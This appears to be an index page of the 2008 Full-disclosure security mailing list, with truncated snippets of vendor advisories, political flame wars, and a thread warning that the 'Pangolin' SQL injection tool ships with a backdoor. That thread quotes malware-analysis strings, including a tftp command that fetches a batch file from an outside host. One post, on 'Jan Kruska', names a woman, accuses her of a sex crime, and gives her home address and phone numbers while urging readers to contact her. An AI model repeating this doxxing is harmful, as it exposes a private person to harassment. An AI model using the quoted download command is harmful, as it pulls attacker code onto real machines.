Re: [Full-disclosure] Free Iraq

http://you.justgotowned.com Sent from my BlackBerry® smartphone with SprintSpeed -Original Message- From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> Date: Wed, 26 Mar 2008 20:22:24 To:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Free Iraq

Re: [Full-disclosure] Free Tibet..

Not just Tibet. PRC wants to own every land around them [1]. [1] On Wed, Mar 26, 2008 at 11:35 PM, Robert Smits <[EMAIL PROTECTED]> wrote: > On March 24, 2008 10:31:55 pm Jerome Jar wrote: > > Please, I humbly think that you know possibly nothing ab

[Full-disclosure] [ MDVSA-2008:078 ] - Updated openssh packages fix X connection hijacking

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:078 http://www.mandriva.com/security/ ___

Re: [Full-disclosure] Free Iraq

=== On Wed, Mar 26, 2008 at 3:55 PM, net-dummy wrote: > >Iraq is an invaded country, and America has no right to be there at all. > Actually, dummy... The Iraqi invasion of Kuwait in August of 1990 led to a United Nations au

[Full-disclosure] [ MDVSA-2008:077 ] - Updated perl-Tk packages fix GIF processing vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:077 http://www.mandriva.com/security/ ___

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Just some interesting strings and such: pdf_poc.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=024c7616e34fe444398545b69c829e1d&refresh=1 ..\\..\\..\\..\\windows\\system32\\cmd.exe ..\\..\\..\\..\\windows\\system32\\tftp.exe -i zwell.3322.org a.bat Cpdf_poc.txt Cpdf_poc.txt Cpdf_poc.

[Full-disclosure] [USN-596-1] Ruby vulnerabilities

=== Ubuntu Security Notice USN-596-1 March 26, 2008 ruby1.8 vulnerabilities CVE-2007-5162, CVE-2007-5770 === A security issue affects the following Ubuntu releases: Ubuntu

[Full-disclosure] [USN-595-1] SDL_image vulnerabilities

=== Ubuntu Security Notice USN-595-1 March 26, 2008 sdl-image1.2 vulnerabilities CVE-2007-6697, CVE-2008-0544 === A security issue affects the following Ubuntu releases: Ub

[Full-disclosure] [USN-594-1] libnet-dns-perl vulnerability

=== Ubuntu Security Notice USN-594-1 March 26, 2008 libnet-dns-perl vulnerability CVE-2007-6341 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS

[Full-disclosure] [USN-593-1] Dovecot vulnerabilities

=== Ubuntu Security Notice USN-593-1 March 26, 2008 dovecot vulnerabilities CVE-2008-1199, CVE-2008-1218 === A security issue affects the following Ubuntu releases: Ubuntu

[Full-disclosure] [ MDVSA-2008:076 ] - Updated wml packages fix symlink vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:076 http://www.mandriva.com/security/ ___

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

http://www.nosec.org/web/files/demon.exe http://www.virustotal.com/analisis/0bfb9d08a2dfe0ad413d08491d0a82a3 http://www.nosec.org/web/files/pdf_poc.exe http://www.virustotal.com/analisis/d619319b2c4a7c5bb3a81adf25bf6559 http://www.nosec.org/web/files/zps.exe http://www.virustotal.com/analisis/26d

[Full-disclosure] Multiple vulnerabilities in solidDB 06.00.1018

### Luigi Auriemma Application: IBM solidDB http://www.solidtech.com/en/products/relationaldatabasemanagementsoftware/embed.asp Versions: <= 06.00.1018 Platforms:Windows (test

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Ok, you are right. [EMAIL PROTECTED] ~ % wget http://www.nosec.org/web/index.txt :( --20:23:14-- http://www.nosec.org/web/index.txt => `index.txt' Auflösen des Hostnamen »

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Not yet. C:\Users\Micheal\Research>wget http://www.nosec.org/web/index.txt --15:12:52-- http://www.nosec.org/web/index.txt => `index.txt' Resolving www.nosec.org... done. Connecting to www.nosec.org[218.92.8.74]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

o0 hmm nice try 0o I will not really know how many people now have a trojan horse or worm on their Pc. snake [EMAIL PROTECTED] schrieb: > > Pangolin is a GUI tool running on Windows to perform as more as > possible pen-testing through SQL injection. This version now supports > followin

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

With firefox - URL: *http://www.nosec.org/a.exe* http://www.w3.org/TR/html4/strict.dtd";> ?? BODY { font: 9pt/12pt ?? } H1 { font: 12pt/15pt ?? } H2 { font: 9pt/12pt ?? } A:link { color: red } A:visited { color: maroon } ?? ???: ?

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Hi Folks, Just for curiosity, did anyone of this list already tried to do a reverse engineering of the Pangolin's code ? Ricardo> Not me, although I did looked at it. I thought great, kiddies are going to love this > Sent from my BlackBerry® smartphone with SprintSpeed > > -Original Messag

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

C:\Users\Micheal\Research>..\bin\upx\upx -d pangolin_bin\out\pangolin.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007 UPX 3.02w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 16th 2007 File size

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Not me, although I did looked at it. I thought great, kiddies are going to love this Sent from my BlackBerry® smartphone with SprintSpeed -Original Message- From: davidrook <[EMAIL PROTECTED]> Date: Wed, 26 Mar 2008 17:23:03 To:Razi Shaban <[EMAIL PROTECTED]> Cc:full-disclosure@lists.gr

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

I wonder how many readers of this list now have a backdoor on their machine... Razi Shaban wrote: > Hmm... > Backdoors eh? > > Nice try. > > -- > razi > > On 3/26/08, A. Ramos <[EMAIL PROTECTED]> wrote: > >> Take a look over: >> http://www.virustotal.com/analisis/0603d534b0128bf81ec57

[Full-disclosure] ZDI-08-013: Novell eDirectory for Linux Stack Overflow

ZDI-08-013: Novell eDirectory for Linux Stack Overflow http://www.zerodayinitiative.com/advisories/ZDI-08-013 March 26, 2008 -- CVE ID: CVE-2008-0924 -- Affected Vendors: Novell -- Affected Products: Novell eDirectory -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

Hmm... Backdoors eh? Nice try. -- razi On 3/26/08, A. Ramos <[EMAIL PROTECTED]> wrote: > Take a look over: > http://www.virustotal.com/analisis/0603d534b0128bf81ec57a8ab00e145c > > > > 2008/3/26 <[EMAIL PROTECTED]>: > > > > > > > > > > > Pangolin is a GUI tool running on Windows to perfor

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

Take a look over: http://www.virustotal.com/analisis/0603d534b0128bf81ec57a8ab00e145c 2008/3/26 <[EMAIL PROTECTED]>: > > > > > Pangolin is a GUI tool running on Windows to perform as more as possible > pen-testing through SQL injection. This version now supports following > databases and operat

[Full-disclosure] Cisco Security Advisory: Cisco IOS Multicast Virtual Private Network (MVPN) Data Leak

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS Multicast Virtual Private Network (MVPN) Data Leak Advisory ID: cisco-sa-20080326-mvpn http://www.cisco.com/warp/public/707/cisco-sa-20080326-mvpn.shtml Revision 1.0 For Public Release

[Full-disclosure] Cisco Security Advisory: Cisco IOS Virtual Private Dial-up Network Denial of Service Vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS Virtual Private Dial-up Network Denial of Service Vulnerability Advisory ID: cisco-sa-20080326-pptp http://www.cisco.com/warp/public/707/cisco-sa-20080326-pptp.shtml Revision 1.0 For

[Full-disclosure] Cisco Security Advisory: Vulnerability in Cisco IOS with OSPF, MPLS VPN, and Supervisor 32, Supervisor 720, or Route Switch Processor 720

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Vulnerability in Cisco IOS with OSPF, MPLS VPN, and Supervisor 32, Supervisor 720, or Route Switch Processor 720 Advisory ID: cisco-sa-20080326-queue http://www.cisco.com

[Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

Pangolin is a GUI tool running on Windows to perform as more as possible pen-testing through SQL injection. This version now supports following databases and operations:* MSSQL : Server informations, Datas, CMD execute, Regedit, Write file, Download file, Read file, File Browser...* MYSQL : Ser

[Full-disclosure] [USN-592-1] Firefox vulnerabilities

=== Ubuntu Security Notice USN-592-1 March 26, 2008 firefox vulnerabilities CVE-2007-4879, CVE-2008-0416, CVE-2008-1195, CVE-2008-1233, CVE-2008-1234, CVE-2008-1235, CVE-2008-1236, CVE-2008-1237, CVE-2008-1238, CVE-2008-1240, CVE-

[Full-disclosure] Free Iraq..

On Wed, Mar 26, 2008 at 3:35 PM, Robert Smits <[EMAIL PROTECTED]> wrote: > Tibet is an invaded country, and China has no right to be there at all. Iraq is an invaded country, and America has no right to be there at all. ___ Full-Disclosure - We believe

Re: [Full-disclosure] Free Tibet..

On March 24, 2008 10:31:55 pm Jerome Jar wrote: > Please, I humbly think that you know possibly nothing about Tibet, the > province of China. > > A lot of Chinese people, who used to take western medias as the > representation of good will and perhaps democracy, do feel sick of the > misleading new

Re: [Full-disclosure] Free Tibet..

People of little intellect cannot be persuaded through intelligent debate, flaming doesn't work either. I suggest you all stop, as you're doing nothing but wasting your own time. -- razi On 3/26/08, Adam Hunt <[EMAIL PROTECTED]> wrote: > Jun, Jun, Jun, > > If your going to go back that far your

Re: [Full-disclosure] Free Tibet..

Jun, Jun, Jun, If your going to go back that far your going to have to redraw many lines on the globe. Or is the PRC a special case? Let's pick a place in recent history as starting point. I'm sure that you will find that the PRC is still bad and has no right to hold any country captive. T

Re: [Full-disclosure] Jan Kruska

Guy Fawkes is the new Luther Blisset ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Free Tibet..

Missile Heads? Good God... You sound almost as stupid as that idiot who called Tibet a province of China. Short of global thermonuclear war, nothing is going to change in Tibet in our lifetimes; and there is nothing the people reading this list can do about that. And I want the 3 minutes back th

Re: [Full-disclosure] Native American Indians Reassert Control Over Tribal Lands

Hi! Jon O. wrote: > But, this is a security list, so please protest in person, > leak some .cn gov documents or do something useful -- you'll > just get flamed posting political rants. > Thank you for your email - if more political postings containing "sensitive" keywords show up, this might m

Re: [Full-disclosure] Static Injection into Commercial Lines - DoS on Vonage - Current Status

Hi! Jan Clairmont wrote: > I have received calls and the caller is injected with a sound similar to a > fax modem static. Now my outbound callers hear static. This is obviously a > problem either with Comcasts injecting noise packets or Verizon or a carrier > that carries the VOIP call. This

Re: [Full-disclosure] Static Injection into Commercial Lines - DoSon Vonage - Current Status

Could be reflection on the transport -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kern Sent: Tuesday, March 25, 2008 10:56 AM To: Jan Clairmont Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Static Injection into Commercial

[Full-disclosure] rPSA-2008-0120-1 gnome-ssh-askpass openssh openssh-client openssh-server

rPath Security Advisory: 2008-0120-1 Published: 2008-03-25 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Major Exposure Level Classification: Local User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/4.7p1-0.2-1 [EMAIL PROTECT

[Full-disclosure] rPSA-2008-0123-1 ruby

rPath Security Advisory: 2008-0123-1 Published: 2008-03-25 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Minor Exposure Level Classification: Remote Deterministic Information Exposure Updated Versions: [EMAIL PROTECTED]:1/1.8.6_p114-1-0.1 rPath Issue Tra

[Full-disclosure] Jan Kruska

Jan Kruska is a pedophile that had sex with a child when she was 22 years old. Now she campaigns to let others have sex with children. If you disagree with her, feel free to let her know. You can contact Jan at: Jan Kruska 4102 W Woodridge Dr. Glendale, Arizona 85308 (503) 389-7679 (602) 579-8

Re: [Full-disclosure] Free Tibet..

Hi Adam, Nice to talking to you. First, Please pull you head out of your *great education*. Have you ever read Chinese history books(Note: This is not written by this government but every dynasty)？and how many have you read? and please make clear who is "lack of knowlege". "Tibet was invaded during